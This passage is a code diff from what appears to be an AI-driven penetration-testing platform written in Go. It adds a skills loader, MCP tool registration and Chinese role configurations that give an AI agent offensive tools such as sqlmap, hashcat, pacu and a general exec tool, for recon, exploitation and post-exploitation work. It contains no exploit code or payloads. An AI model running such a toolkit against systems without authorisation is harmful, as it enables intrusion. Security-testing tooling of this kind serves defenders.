Content []SamplingContent `json:"content"`
|
||||
Model string `json:"model,omitempty"`
|
||||
StopReason string `json:"stopReason,omitempty"`
|
||||
Content []SamplingContent `json:"content"`
|
||||
Model string `json:"model,omitempty"`
|
||||
StopReason string `json:"stopReason,omitempty"`
|
||||
}
|
||||
|
||||
// SamplingContent 采样内容
|
||||
@@ -282,4 +293,3 @@ type SamplingContent struct {
|
||||
Type string `json:"type"`
|
||||
Text string `json:"text,omitempty"`
|
||||
}
|
||||
|
||||
|
||||
@@ -3,6 +3,7 @@ package security
|
||||
import (
|
||||
"bufio"
|
||||
"context"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"io"
|
||||
"os/exec"
|
||||
@@ -223,22 +224,25 @@ func (e *Executor) RegisterTools(mcpServer *mcp.Server) {
|
||||
toolName := toolConfig.Name
|
||||
toolConfigCopy := toolConfig
|
||||
|
||||
// 使用简短描述(如果存在),否则使用详细描述的前100个字符
|
||||
// 根据配置决定暴露给 AI/API 的描述:short_description 或 description
|
||||
useFullDescription := strings.TrimSpace(strings.ToLower(e.config.ToolDescriptionMode)) == "full"
|
||||
shortDesc := toolConfigCopy.ShortDescription
|
||||
if shortDesc == "" {
|
||||
// 如果没有简短描述,从详细描述中提取第一行或前100个字符
|
||||
// 如果没有简短描述,从详细描述中提取第一行或前10000个字符
|
||||
desc := toolConfigCopy.Description
|
||||
if len(desc) > 100 {
|
||||
// 尝试找到第一个换行符
|
||||
if idx := strings.Index(desc, "\n"); idx > 0 && idx < 100 {
|
||||
if len(desc) > 10000 {
|
||||
if idx := strings.Index(desc, "\n"); idx > 0 && idx < 10000 {
|
||||
shortDesc = strings.TrimSpace(desc[:idx])
|
||||
} else {
|
||||
shortDesc = desc[:100] + "..."
|
||||
shortDesc = desc[:10000] + "..."
|
||||
}
|
||||
} else {
|
||||
shortDesc = desc
|
||||
}
|
||||
}
|
||||
if useFullDescription {
|
||||
shortDesc = "" // 使用 description 时清空 ShortDescription,下游会回退到 Description
|
||||
}
|
||||
|
||||
tool := mcp.Tool{
|
||||
Name: toolConfigCopy.Name,
|
||||
@@ -302,7 +306,23 @@ func (e *Executor) buildCommandArgs(toolName string, toolConfig *config.ToolConf
|
||||
}
|
||||
}
|
||||
|
||||
// 先处理标志参数(对于大多数命令,标志应该在位置参数之前)
|
||||
// 对于需要子命令的工具(如 gobuster dir),position 0 必须紧跟在命令名后、所有 flag 之前
|
||||
for _, param := range positionalParams {
|
||||
if param.Name == "additional_args" || param.Name == "scan_type" || param.Name == "action" {
|
||||
continue
|
||||
}
|
||||
if param.Position != nil && *param.Position == 0 {
|
||||
value := e.getParamValue(args, param)
|
||||
if value == nil && param.Default != nil {
|
||||
value = param.Default
|
||||
}
|
||||
if value != nil {
|
||||
cmdArgs = append(cmdArgs, e.formatParamValue(param, value))
|
||||
}
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
// 处理标志参数
|
||||
for _, param := range flagParams {
|
||||
// 跳过特殊参数,它们会在后面单独处理
|
||||
@@ -415,7 +435,11 @@ func (e *Executor) buildCommandArgs(toolName string, toolConfig *config.ToolConf
|
||||
}
|
||||
|
||||
// 按位置顺序处理参数,确保即使某些位置没有参数或使用默认值,也能正确传递
|
||||
// position 0 已在前面插入(子命令优先),此处从 1 开始
|
||||
for i := 0; i <= maxPosition; i++ {
|
||||
if i == 0 {
|
||||
continue
|
||||
}
|
||||
for _, param := range positionalParams {
|
||||
// 跳过特殊参数,它们会在后面单独处理
|
||||
// action 参数仅用于工具内部逻辑,不传递给命令
|
||||
@@ -616,6 +640,13 @@ func (e *Executor) formatParamValue(param config.ParameterConfig, value interfac
|
||||
return strings.Join(strs, ",")
|
||||
}
|
||||
return fmt.Sprintf("%v", value)
|
||||
case "object":
|
||||
// 对象/字典:序列化为 JSON 字符串
|
||||
if jsonBytes, err := json.Marshal(value); err == nil {
|
||||
return string(jsonBytes)
|
||||
}
|
||||
// 如果 JSON 序列化失败,回退到默认格式化
|
||||
return fmt.Sprintf("%v", value)
|
||||
default:
|
||||
formattedValue := fmt.Sprintf("%v", value)
|
||||
// 特殊处理:对于 ports 参数(通常是 nmap 等工具的端口参数),清理空格
|
||||
@@ -1182,7 +1213,15 @@ func (e *Executor) buildInputSchema(toolConfig *config.ToolConfig) map[string]in
|
||||
required := []string{}
|
||||
|
||||
for _, param := range toolConfig.Parameters {
|
||||
// 转换类型为OpenAI/JSON Schema标准类型
|
||||
// 跳过 name 为空的参数(避免 YAML 中 name: null 或空导致非法 schema)
|
||||
if strings.TrimSpace(param.Name) == "" {
|
||||
e.logger.Debug("跳过无名称的参数",
|
||||
zap.String("tool", toolConfig.Name),
|
||||
zap.String("type", param.Type),
|
||||
)
|
||||
continue
|
||||
}
|
||||
// 转换类型为OpenAI/JSON Schema标准类型(空类型默认为 string)
|
||||
openAIType := e.convertToOpenAIType(param.Type)
|
||||
|
||||
prop := map[string]interface{}{
|
||||
@@ -1224,6 +1263,10 @@ func (e *Executor) buildInputSchema(toolConfig *config.ToolConfig) map[string]in
|
||||
|
||||
// convertToOpenAIType 将配置中的类型转换为OpenAI/JSON Schema标准类型
|
||||
func (e *Executor) convertToOpenAIType(configType string) string {
|
||||
// 空或 null 类型统一视为 string,避免非法 schema 导致工具调用失败
|
||||
if strings.TrimSpace(configType) == "" {
|
||||
return "string"
|
||||
}
|
||||
switch configType {
|
||||
case "bool":
|
||||
return "boolean"
|
||||
|
||||
@@ -0,0 +1,239 @@
|
||||
package skills
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
"sync"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// Manager Skills管理器
|
||||
type Manager struct {
|
||||
skillsDir string
|
||||
logger *zap.Logger
|
||||
skills map[string]*Skill // 缓存已加载的skills
|
||||
mu sync.RWMutex // 保护skills map的并发访问
|
||||
}
|
||||
|
||||
// Skill Skill定义
|
||||
type Skill struct {
|
||||
Name string // Skill名称
|
||||
Description string // Skill描述
|
||||
Content string // Skill内容(从SKILL.md中提取)
|
||||
Path string // Skill路径
|
||||
}
|
||||
|
||||
// NewManager 创建新的Skills管理器
|
||||
func NewManager(skillsDir string, logger *zap.Logger) *Manager {
|
||||
return &Manager{
|
||||
skillsDir: skillsDir,
|
||||
logger: logger,
|
||||
skills: make(map[string]*Skill),
|
||||
}
|
||||
}
|
||||
|
||||
// LoadSkill 加载单个skill
|
||||
func (m *Manager) LoadSkill(skillName string) (*Skill, error) {
|
||||
// 先尝试读锁检查缓存
|
||||
m.mu.RLock()
|
||||
if skill, exists := m.skills[skillName]; exists {
|
||||
m.mu.RUnlock()
|
||||
return skill, nil
|
||||
}
|
||||
m.mu.RUnlock()
|
||||
|
||||
// 构建skill路径
|
||||
skillPath := filepath.Join(m.skillsDir, skillName)
|
||||
|
||||
// 检查目录是否存在
|
||||
if _, err := os.Stat(skillPath); os.IsNotExist(err) {
|
||||
return nil, fmt.Errorf("skill %s not found", skillName)
|
||||
}
|
||||
|
||||
// 查找SKILL.md文件
|
||||
skillFile := filepath.Join(skillPath, "SKILL.md")
|
||||
if _, err := os.Stat(skillFile); os.IsNotExist(err) {
|
||||
// 尝试其他可能的文件名
|
||||
alternatives := []string{
|
||||
filepath.Join(skillPath, "skill.md"),
|
||||
filepath.Join(skillPath, "README.md"),
|
||||
filepath.Join(skillPath, "readme.md"),
|
||||
}
|
||||
found := false
|
||||
for _, alt := range alternatives {
|
||||
if _, err := os.Stat(alt); err == nil {
|
||||
skillFile = alt
|
||||
found = true
|
||||
break
|
||||
}
|
||||
}
|
||||
if !found {
|
||||
return nil, fmt.Errorf("skill file not found for %s", skillName)
|
||||
}
|
||||
}
|
||||
|
||||
// 读取skill文件
|
||||
content, err := os.ReadFile(skillFile)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to read skill file: %w", err)
|
||||
}
|
||||
|
||||
// 解析skill内容
|
||||
skill := m.parseSkillContent(string(content), skillName, skillPath)
|
||||
|
||||
// 使用写锁缓存skill(双重检查,避免重复加载)
|
||||
m.mu.Lock()
|
||||
// 再次检查,可能其他goroutine已经加载了
|
||||
if existing, exists := m.skills[skillName]; exists {
|
||||
m.mu.Unlock()
|
||||
return existing, nil
|
||||
}
|
||||
m.skills[skillName] = skill
|
||||
m.mu.Unlock()
|
||||
|
||||
return skill, nil
|
||||
}
|
||||
|
||||
// LoadSkills 批量加载skills
|
||||
func (m *Manager) LoadSkills(skillNames []string) ([]*Skill, error) {
|
||||
var skills []*Skill
|
||||
var errors []string
|
||||
|
||||
for _, name := range skillNames {
|
||||
skill, err := m.LoadSkill(name)
|
||||
if err != nil {
|
||||
errors = append(errors, fmt.Sprintf("failed to load skill %s: %v", name, err))
|
||||
m.logger.Warn("加载skill失败", zap.String("skill", name), zap.Error(err))
|
||||
continue
|
||||
}
|
||||
skills = append(skills, skill)
|
||||
}
|
||||
|
||||
if len(errors) > 0 && len(skills) == 0 {
|
||||
return nil, fmt.Errorf("failed to load any skills: %s", strings.Join(errors, "; "))
|
||||
}
|
||||
|
||||
return skills, nil
|
||||
}
|
||||
|
||||
// ListSkills 列出所有可用的skills
|
||||
func (m *Manager) ListSkills() ([]string, error) {
|
||||
if _, err := os.Stat(m.skillsDir); os.IsNotExist(err) {
|
||||
return []string{}, nil
|
||||
}
|
||||
|
||||
entries, err := os.ReadDir(m.skillsDir)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("failed to read skills directory: %w", err)
|
||||
}
|
||||
|
||||
var skills []string
|
||||
for _, entry := range entries {
|
||||
if !entry.IsDir() {
|
||||
continue
|
||||
}
|
||||
|
||||
skillName := entry.Name()
|
||||
// 检查是否有SKILL.md文件
|
||||
skillFile := filepath.Join(m.skillsDir, skillName, "SKILL.md")
|
||||
if _, err := os.Stat(skillFile); err == nil {
|
||||
skills = append(skills, skillName)
|
||||
continue
|
||||
}
|
||||
|
||||
// 尝试其他可能的文件名
|
||||
alternatives := []string{
|
||||
filepath.Join(m.skillsDir, skillName, "skill.md"),
|
||||
filepath.Join(m.skillsDir, skillName, "README.md"),
|
||||
filepath.Join(m.skillsDir, skillName, "readme.md"),
|
||||
}
|
||||
for _, alt := range alternatives {
|
||||
if _, err := os.Stat(alt); err == nil {
|
||||
skills = append(skills, skillName)
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return skills, nil
|
||||
}
|
||||
|
||||
// parseSkillContent 解析skill内容
|
||||
// 支持YAML front matter格式,类似goskills
|
||||
func (m *Manager) parseSkillContent(content, skillName, skillPath string) *Skill {
|
||||
skill := &Skill{
|
||||
Name: skillName,
|
||||
Path: skillPath,
|
||||
}
|
||||
|
||||
// 检查是否有YAML front matter
|
||||
if strings.HasPrefix(content, "---") {
|
||||
parts := strings.SplitN(content, "---", 3)
|
||||
if len(parts) >= 3 {
|
||||
// 解析front matter(简单实现,只提取name和description)
|
||||
frontMatter := parts[1]
|
||||
lines := strings.Split(frontMatter, "\n")
|
||||
for _, line := range lines {
|
||||
line = strings.TrimSpace(line)
|
||||
if strings.HasPrefix(line, "name:") {
|
||||
name := strings.TrimSpace(strings.TrimPrefix(line, "name:"))
|
||||
name = strings.Trim(name, `"'"`)
|
||||
if name != "" {
|
||||
skill.Name = name
|
||||
}
|
||||
} else if strings.HasPrefix(line, "description:") {
|
||||
desc := strings.TrimSpace(strings.TrimPrefix(line, "description:"))
|
||||
desc = strings.Trim(desc, `"'"`)
|
||||
skill.Description = desc
|
||||
}
|
||||
}
|
||||
// 剩余部分是内容
|
||||
if len(parts) == 3 {
|
||||
skill.Content = strings.TrimSpace(parts[2])
|
||||
}
|
||||
} else {
|
||||
// 没有front matter,整个内容就是skill内容
|
||||
skill.Content = content
|
||||
}
|
||||
} else {
|
||||
// 没有front matter,整个内容就是skill内容
|
||||
skill.Content = content
|
||||
}
|
||||
|
||||
// 如果内容为空,使用描述作为内容
|
||||
if skill.Content == "" {
|
||||
skill.Content = skill.Description
|
||||
}
|
||||
|
||||
return skill
|
||||
}
|
||||
|
||||
// GetSkillContent 获取skill的完整内容(用于注入到系统提示词)
|
||||
func (m *Manager) GetSkillContent(skillNames []string) (string, error) {
|
||||
skills, err := m.LoadSkills(skillNames)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
|
||||
if len(skills) == 0 {
|
||||
return "", nil
|
||||
}
|
||||
|
||||
var builder strings.Builder
|
||||
builder.WriteString("## 可用Skills\n\n")
|
||||
builder.WriteString("在执行任务前,请仔细阅读以下skills内容,这些内容包含了相关的专业知识和方法:\n\n")
|
||||
|
||||
for _, skill := range skills {
|
||||
builder.WriteString(fmt.Sprintf("### Skill: %s\n", skill.Name))
|
||||
if skill.Description != "" {
|
||||
builder.WriteString(fmt.Sprintf("**描述**: %s\n\n", skill.Description))
|
||||
}
|
||||
builder.WriteString(skill.Content)
|
||||
builder.WriteString("\n\n---\n\n")
|
||||
}
|
||||
|
||||
return builder.String(), nil
|
||||
}
|
||||
@@ -0,0 +1,201 @@
|
||||
package skills
|
||||
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/mcp"
|
||||
"cyberstrike-ai/internal/mcp/builtin"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// RegisterSkillsTool 注册Skills工具到MCP服务器
|
||||
func RegisterSkillsTool(
|
||||
mcpServer *mcp.Server,
|
||||
manager *Manager,
|
||||
logger *zap.Logger,
|
||||
) {
|
||||
RegisterSkillsToolWithStorage(mcpServer, manager, nil, logger)
|
||||
}
|
||||
|
||||
// RegisterSkillsToolWithStorage 注册Skills工具到MCP服务器(带存储支持)
|
||||
func RegisterSkillsToolWithStorage(
|
||||
mcpServer *mcp.Server,
|
||||
manager *Manager,
|
||||
storage SkillStatsStorage,
|
||||
logger *zap.Logger,
|
||||
) {
|
||||
// 注册第一个工具:获取所有可用的skills列表
|
||||
listSkillsTool := mcp.Tool{
|
||||
Name: builtin.ToolListSkills,
|
||||
Description: "获取所有可用的skills列表。Skills是专业知识文档,可以在执行任务前阅读以获取相关专业知识。使用此工具可以查看系统中所有可用的skills,然后使用read_skill工具读取特定skill的内容。",
|
||||
ShortDescription: "获取所有可用的skills列表",
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{},
|
||||
"required": []string{},
|
||||
},
|
||||
}
|
||||
|
||||
listSkillsHandler := func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) {
|
||||
skills, err := manager.ListSkills()
|
||||
if err != nil {
|
||||
logger.Error("获取skills列表失败", zap.Error(err))
|
||||
return &mcp.ToolResult{
|
||||
Content: []mcp.Content{
|
||||
{
|
||||
Type: "text",
|
||||
Text: fmt.Sprintf("获取skills列表失败: %v", err),
|
||||
},
|
||||
},
|
||||
IsError: true,
|
||||
}, nil
|
||||
}
|
||||
|
||||
if len(skills) == 0 {
|
||||
return &mcp.ToolResult{
|
||||
Content: []mcp.Content{
|
||||
{
|
||||
Type: "text",
|
||||
Text: "当前没有可用的skills。\n\nSkills是专业知识文档,可以在执行任务前阅读以获取相关专业知识。你可以在skills目录下创建新的skill。",
|
||||
},
|
||||
},
|
||||
IsError: false,
|
||||
}, nil
|
||||
}
|
||||
|
||||
var result strings.Builder
|
||||
result.WriteString(fmt.Sprintf("共有 %d 个可用的skills:\n\n", len(skills)))
|
||||
for i, skill := range skills {
|
||||
result.WriteString(fmt.Sprintf("%d. %s\n", i+1, skill))
|
||||
}
|
||||
result.WriteString("\n使用 read_skill 工具可以读取特定skill的详细内容。\n")
|
||||
result.WriteString("例如:read_skill(skill_name=\"sql-injection-testing\")")
|
||||
|
||||
return &mcp.ToolResult{
|
||||
Content: []mcp.Content{
|
||||
{
|
||||
Type: "text",
|
||||
Text: result.String(),
|
||||
},
|
||||
},
|
||||
IsError: false,
|
||||
}, nil
|
||||
}
|
||||
|
||||
mcpServer.RegisterTool(listSkillsTool, listSkillsHandler)
|
||||
logger.Info("注册skills列表工具成功")
|
||||
|
||||
// 注册第二个工具:读取特定skill的内容
|
||||
readSkillTool := mcp.Tool{
|
||||
Name: builtin.ToolReadSkill,
|
||||
Description: "读取指定skill的详细内容。Skills是专业知识文档,包含测试方法、工具使用、最佳实践等。在执行相关任务前,可以调用此工具读取相关skill的内容,以获取专业知识和指导。",
|
||||
ShortDescription: "读取指定skill的详细内容",
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"skill_name": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "要读取的skill名称(必需)。可以使用list_skills工具获取所有可用的skill名称。",
|
||||
},
|
||||
},
|
||||
"required": []string{"skill_name"},
|
||||
},
|
||||
}
|
||||
|
||||
readSkillHandler := func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) {
|
||||
skillName, ok := args["skill_name"].(string)
|
||||
if !ok || skillName == "" {
|
||||
return &mcp.ToolResult{
|
||||
Content: []mcp.Content{
|
||||
{
|
||||
Type: "text",
|
||||
Text: "错误: skill_name 参数必需且不能为空。请使用list_skills工具获取所有可用的skill名称。",
|
||||
},
|
||||
},
|
||||
IsError: true,
|
||||
}, nil
|
||||
}
|
||||
|
||||
skill, err := manager.LoadSkill(skillName)
|
||||
failed := err != nil
|
||||
now := time.Now()
|
||||
|
||||
// 记录调用统计
|
||||
if storage != nil {
|
||||
totalCalls := 1
|
||||
successCalls := 0
|
||||
failedCalls := 0
|
||||
if failed {
|
||||
failedCalls = 1
|
||||
} else {
|
||||
successCalls = 1
|
||||
}
|
||||
if err := storage.UpdateSkillStats(skillName, totalCalls, successCalls, failedCalls, &now); err != nil {
|
||||
logger.Warn("保存Skills统计信息失败", zap.String("skill", skillName), zap.Error(err))
|
||||
} else {
|
||||
logger.Info("Skills统计信息已更新",
|
||||
zap.String("skill", skillName),
|
||||
zap.Int("totalCalls", totalCalls),
|
||||
zap.Int("successCalls", successCalls),
|
||||
zap.Int("failedCalls", failedCalls))
|
||||
}
|
||||
} else {
|
||||
logger.Warn("Skills统计存储未配置,无法记录调用统计", zap.String("skill", skillName))
|
||||
}
|
||||
|
||||
if err != nil {
|
||||
logger.Warn("读取skill失败", zap.String("skill", skillName), zap.Error(err))
|
||||
return &mcp.ToolResult{
|
||||
Content: []mcp.Content{
|
||||
{
|
||||
Type: "text",
|
||||
Text: fmt.Sprintf("读取skill失败: %v\n\n请使用list_skills工具确认skill名称是否正确。", err),
|
||||
},
|
||||
},
|
||||
IsError: true,
|
||||
}, nil
|
||||
}
|
||||
|
||||
var result strings.Builder
|
||||
result.WriteString(fmt.Sprintf("## Skill: %s\n\n", skill.Name))
|
||||
if skill.Description != "" {
|
||||
result.WriteString(fmt.Sprintf("**描述**: %s\n\n", skill.Description))
|
||||
}
|
||||
result.WriteString("---\n\n")
|
||||
result.WriteString(skill.Content)
|
||||
result.WriteString("\n\n---\n\n")
|
||||
result.WriteString(fmt.Sprintf("*Skill路径: %s*", skill.Path))
|
||||
|
||||
return &mcp.ToolResult{
|
||||
Content: []mcp.Content{
|
||||
{
|
||||
Type: "text",
|
||||
Text: result.String(),
|
||||
},
|
||||
},
|
||||
IsError: false,
|
||||
}, nil
|
||||
}
|
||||
|
||||
mcpServer.RegisterTool(readSkillTool, readSkillHandler)
|
||||
logger.Info("注册skill读取工具成功")
|
||||
}
|
||||
|
||||
// SkillStatsStorage Skills统计存储接口
|
||||
type SkillStatsStorage interface {
|
||||
UpdateSkillStats(skillName string, totalCalls, successCalls, failedCalls int, lastCallTime *time.Time) error
|
||||
LoadSkillStats() (map[string]*SkillStats, error)
|
||||
}
|
||||
|
||||
// SkillStats Skills统计信息
|
||||
type SkillStats struct {
|
||||
SkillName string
|
||||
TotalCalls int
|
||||
SuccessCalls int
|
||||
FailedCalls int
|
||||
LastCallTime *time.Time
|
||||
}
|
||||
@@ -5,10 +5,13 @@ charset-normalizer>=3.3.2
|
||||
chardet>=5.2.0
|
||||
|
||||
# Python exploitation / analysis frameworks referenced by tool recipes
|
||||
angr>=9.2.96
|
||||
# angr>=9.2.96
|
||||
# pwntools>=4.12.0
|
||||
arjun>=2.2.0
|
||||
uro>=1.0.2
|
||||
|
||||
bloodhound>=1.6.1
|
||||
impacket>=0.11.0
|
||||
|
||||
# MCP (Model Context Protocol) SDK
|
||||
mcp>=1.0.0
|
||||
|
||||
@@ -0,0 +1,22 @@
|
||||
name: API安全测试
|
||||
description: API安全测试专家,专注于API接口安全检测
|
||||
user_prompt: 你是一个专业的API安全测试专家。请使用专业的API测试工具对目标API接口进行全面的安全检测,包括GraphQL安全、API参数fuzzing、JWT分析、API架构分析等工作。
|
||||
icon: "\U0001F4E1"
|
||||
tools:
|
||||
- api-fuzzer
|
||||
- api-schema-analyzer
|
||||
- graphql-scanner
|
||||
- arjun
|
||||
- jwt-analyzer
|
||||
- http-intruder
|
||||
- http-framework-test
|
||||
- burpsuite
|
||||
- httpx
|
||||
- execute-python-script
|
||||
- install-python-package
|
||||
- record_vulnerability
|
||||
- list_knowledge_risk_types
|
||||
- search_knowledge_base
|
||||
- list_skills
|
||||
- read_skill
|
||||
enabled: true
|
||||
@@ -0,0 +1,35 @@
|
||||
name: CTF
|
||||
description: CTF竞赛专家,擅长解题和漏洞利用
|
||||
user_prompt: 你是一个CTF竞赛专家。请使用CTF解题思维和方法,快速定位和利用漏洞,解决各类CTF题目。
|
||||
icon: "\U0001F3C6"
|
||||
tools:
|
||||
- amass
|
||||
- anew
|
||||
- angr
|
||||
- api-fuzzer
|
||||
- api-schema-analyzer
|
||||
- arjun
|
||||
- arp-scan
|
||||
- autorecon
|
||||
- binwalk
|
||||
- bloodhound
|
||||
- burpsuite
|
||||
- cat
|
||||
- checkov
|
||||
- checksec
|
||||
- cloudmapper
|
||||
- create-file
|
||||
- cyberchef
|
||||
- dalfox
|
||||
- delete-file
|
||||
- httpx
|
||||
- http-framework-test
|
||||
- exec
|
||||
- execute-python-script
|
||||
- install-python-package
|
||||
- record_vulnerability
|
||||
- list_knowledge_risk_types
|
||||
- search_knowledge_base
|
||||
- list_skills
|
||||
- read_skill
|
||||
enabled: true
|
||||
@@ -0,0 +1,67 @@
|
||||
# 角色配置文件说明
|
||||
|
||||
本目录包含所有角色配置文件,每个角色定义了AI的行为模式、可用工具和技能。
|
||||
|
||||
## 创建新角色
|
||||
|
||||
创建新角色时,请在 `roles/` 目录下创建 YAML 文件,格式如下:
|
||||
|
||||
**方式1:显式指定工具列表(推荐)**
|
||||
```yaml
|
||||
name: 角色名称
|
||||
description: 角色描述
|
||||
user_prompt: 用户提示词(追加到用户消息前,用于引导AI行为)
|
||||
icon: "图标(可选)"
|
||||
tools:
|
||||
# 添加你需要的工具...
|
||||
# ⚠️ 重要:建议包含以下5个内置MCP工具
|
||||
- record_vulnerability
|
||||
- list_knowledge_risk_types
|
||||
- search_knowledge_base
|
||||
- list_skills
|
||||
- read_skill
|
||||
enabled: true
|
||||
```
|
||||
|
||||
**方式2:不设置tools字段(使用所有已开启的工具)**
|
||||
```yaml
|
||||
name: 角色名称
|
||||
description: 角色描述
|
||||
user_prompt: 用户提示词(追加到用户消息前,用于引导AI行为)
|
||||
icon: "图标(可选)"
|
||||
# 不设置tools字段,将默认使用所有MCP管理中已开启的工具
|
||||
enabled: true
|
||||
```
|
||||
|
||||
## ⚠️ 重要提醒:内置MCP工具
|
||||
|
||||
**如果设置了 `tools` 字段,请务必在列表中添加以下5个内置MCP工具:**
|
||||
|
||||
1. **`record_vulnerability`** - 漏洞管理工具,用于记录发现的漏洞
|
||||
2. **`list_knowledge_risk_types`** - 知识库工具,列出可用的风险类型
|
||||
3. **`search_knowledge_base`** - 知识库工具,搜索知识库内容
|
||||
4. **`list_skills`** - Skills工具,列出可用的技能
|
||||
5. **`read_skill`** - Skills工具,读取技能详情
|
||||
|
||||
这些内置工具是系统核心功能,建议所有角色都包含它们,以确保:
|
||||
- 能够记录和管理发现的漏洞
|
||||
- 能够访问知识库获取安全测试知识
|
||||
- 能够查看和使用可用的安全测试技能
|
||||
|
||||
**注意**:如果不设置 `tools` 字段,系统会默认使用所有MCP管理中已开启的工具(包括这5个内置工具),但为了明确控制角色可用的工具范围,建议显式设置 `tools` 字段。
|
||||
|
||||
## 角色配置字段说明
|
||||
|
||||
- **name**: 角色名称(必填)
|
||||
- **description**: 角色描述(必填)
|
||||
- **user_prompt**: 用户提示词,会追加到用户消息前,用于引导AI采用特定的测试方法和关注点(可选)
|
||||
- **icon**: 角色图标,支持Unicode emoji(可选)
|
||||
- **tools**: 工具列表,指定该角色可用的工具(可选)
|
||||
- **如果不设置 `tools` 字段**:默认会选中**全部MCP管理中已开启的工具**
|
||||
- **如果设置了 `tools` 字段**:只使用列表中指定的工具(建议至少包含5个内置工具)
|
||||
- **skills**: 技能列表,指定该角色关联的技能(可选)
|
||||
- **enabled**: 是否启用该角色(必填,true/false)
|
||||
|
||||
## 示例
|
||||
|
||||
参考本目录下的其他角色文件,如 `渗透测试.yaml`、`Web应用扫描.yaml` 等。
|
||||
@@ -0,0 +1,27 @@
|
||||
name: Web应用扫描
|
||||
description: Web应用漏洞扫描专家,全面的Web安全检测
|
||||
user_prompt: 你是一个专业的Web应用漏洞扫描专家。请使用各种Web扫描工具对目标Web应用进行全面的安全检测,包括目录枚举、文件扫描、漏洞识别等工作。
|
||||
icon: "\U0001F310"
|
||||
tools:
|
||||
- dirsearch
|
||||
- dirb
|
||||
- gobuster
|
||||
- feroxbuster
|
||||
- ffuf
|
||||
- wfuzz
|
||||
- sqlmap
|
||||
- dalfox
|
||||
- xsser
|
||||
- nikto
|
||||
- nuclei
|
||||
- wpscan
|
||||
- httpx
|
||||
- http-framework-test
|
||||
- execute-python-script
|
||||
- install-python-package
|
||||
- record_vulnerability
|
||||
- list_knowledge_risk_types
|
||||
- search_knowledge_base
|
||||
- list_skills
|
||||
- read_skill
|
||||
enabled: true
|
||||
@@ -0,0 +1,21 @@
|
||||
name: Web框架测试
|
||||
description: Web框架安全测试专家,专注于Web应用框架漏洞检测
|
||||
user_prompt: 你是一个专业的Web框架安全测试专家。请使用专业的工具对Web应用框架进行安全测试,识别框架相关的安全漏洞和配置问题。
|
||||
icon: "\U0001F310"
|
||||
tools:
|
||||
- http-framework-test
|
||||
- nikto
|
||||
- nuclei
|
||||
- wafw00f
|
||||
- wpscan
|
||||
- httpx
|
||||
- burpsuite
|
||||
- zap
|
||||
- execute-python-script
|
||||
- install-python-package
|
||||
- record_vulnerability
|
||||
- list_knowledge_risk_types
|
||||
- search_knowledge_base
|
||||
- list_skills
|
||||
- read_skill
|
||||
enabled: true
|
||||
@@ -0,0 +1,33 @@
|
||||
name: 二进制分析
|
||||
description: 二进制分析与利用专家,擅长逆向工程和密码破解
|
||||
user_prompt: 你是一个专业的二进制分析与利用专家。请使用逆向工程工具分析二进制文件,识别漏洞,进行利用开发。同时擅长密码破解、哈希分析等技术。
|
||||
icon: "\U0001F52C"
|
||||
tools:
|
||||
- dirsearch
|
||||
- docker-bench-security
|
||||
- exec
|
||||
- execute-python-script
|
||||
- install-python-package
|
||||
- ghidra
|
||||
- graphql-scanner
|
||||
- hakrawler
|
||||
- hash-identifier
|
||||
- hashcat
|
||||
- hashpump
|
||||
- http-framework-test
|
||||
- httpx
|
||||
- gdb
|
||||
- radare2
|
||||
- objdump
|
||||
- strings
|
||||
- binwalk
|
||||
- ropper
|
||||
- ropgadget
|
||||
- john
|
||||
- cyberchef
|
||||
- record_vulnerability
|
||||
- list_knowledge_risk_types
|
||||
- search_knowledge_base
|
||||
- list_skills
|
||||
- read_skill
|
||||
enabled: true
|
||||
@@ -0,0 +1,19 @@
|
||||
name: 云安全审计
|
||||
description: 云安全审计专家,多云环境安全检测
|
||||
user_prompt: 你是一个专业的云安全审计专家。请使用专业的云安全工具对AWS、Azure、GCP等云环境进行全面的安全审计,包括配置检查、合规性评估、权限审计、安全最佳实践验证等工作。
|
||||
icon: ☁
|
||||
tools:
|
||||
- prowler
|
||||
- scout-suite
|
||||
- cloudmapper
|
||||
- pacu
|
||||
- terrascan
|
||||
- checkov
|
||||
- execute-python-script
|
||||
- install-python-package
|
||||
- record_vulnerability
|
||||
- list_knowledge_risk_types
|
||||
- search_knowledge_base
|
||||
- list_skills
|
||||
- read_skill
|
||||
enabled: true
|
||||
@@ -0,0 +1,33 @@
|
||||
name: 信息收集
|
||||
description: 资产发现与信息搜集专家
|
||||
user_prompt: 你是一个专业的信息收集专家。请使用各种信息收集技术和工具,对目标进行全面的资产发现、子域名枚举、端口扫描、服务识别等信息收集工作。
|
||||
icon: "\U0001F50D"
|
||||
tools:
|
||||
- amass
|
||||
- subfinder
|
||||
- dnsenum
|
||||
- fierce
|
||||
- fofa_search
|
||||
- zoomeye_search
|
||||
- nmap
|
||||
- masscan
|
||||
- rustscan
|
||||
- arp-scan
|
||||
- nbtscan
|
||||
- httpx
|
||||
- http-framework-test
|
||||
- katana
|
||||
- hakrawler
|
||||
- waybackurls
|
||||
- paramspider
|
||||
- gau
|
||||
- uro
|
||||
- qsreplace
|
||||
- execute-python-script
|
||||
- install-python-package
|
||||
- record_vulnerability
|
||||
- list_knowledge_risk_types
|
||||
- search_knowledge_base
|
||||
- list_skills
|
||||
- read_skill
|
||||
enabled: true
|
||||
@@ -0,0 +1,25 @@
|
||||
name: 后渗透测试
|
||||
description: 后渗透测试专家,权限维持与横向移动
|
||||
user_prompt: 你是一个专业的后渗透测试专家。请使用专业的后渗透工具在获得初始访问权限后进行权限提升、横向移动、权限维持、数据收集等后渗透测试工作。
|
||||
